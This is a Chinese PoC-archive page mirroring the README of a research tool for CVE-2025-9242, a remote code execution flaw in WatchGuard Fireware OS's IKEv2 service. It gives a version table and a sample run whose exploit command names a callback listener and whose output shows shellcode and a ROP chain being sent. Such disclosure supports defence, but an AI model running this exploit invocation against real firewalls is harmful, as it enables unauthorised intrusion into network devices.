关联漏洞
标题:
WatchGuard Fireware OS 安全漏洞
(CVE-2025-9242)
描述:WatchGuard Fireware OS是美国WatchGuard公司的一个在 Firebox 上运行的软件。 WatchGuard Fireware OS 11.10.2版本至11.12.4_Update1版本、12.0版本至12.11.3版本和2025.1版本存在安全漏洞,该漏洞源于越界写入,可能导致远程未经验证的攻击者执行任意代码。
介绍
# watchTowr-vs-WatchGuard-CVE-2025-9242
Detection Artifact Generator for WatchGuard CVE-2025-9242
https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f
See our [blog post](https://labs.watchtowr.com/) for technical details
# Detection in Action
```
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-WatchGuard-CVE-2025-9242.py
(*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator
- McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2025-9242]
[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337
```
# Description
This script attempts to detect if WatchGuard OS is vulnerable to CVE-2025-9242.
# Affected Versions
The following versions of WatchGuard OS are Affected
| Vulnerable Version | Resolved Version |
| ------------------------------- | ------------------------ |
| 2025.1 | 2025.1.1 |
| 12.x | 12.11.4 |
| 12.5.x (T15 & T35 models) | 12.5.13 |
| 12.3.1 (FIPS-certified release) | 12.3.1_Update3 (B722811) |
| 11.x | End of Life |
For more information visit [WatchGuard Firebox iked Out of Bounds Write Vulnerability](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015)
# Follow [watchTowr](https://watchTowr.com) Labs
For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team
- https://labs.watchtowr.com/
- https://x.com/watchtowrcyber
文件快照
[4.0K] /data/pocs/db82b092627ef2dfda7d484c2d0315df6f642101
├── [2.5K] README.md
└── [ 67K] watchTowr-vs-WatchGuard-CVE-2025-9242.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。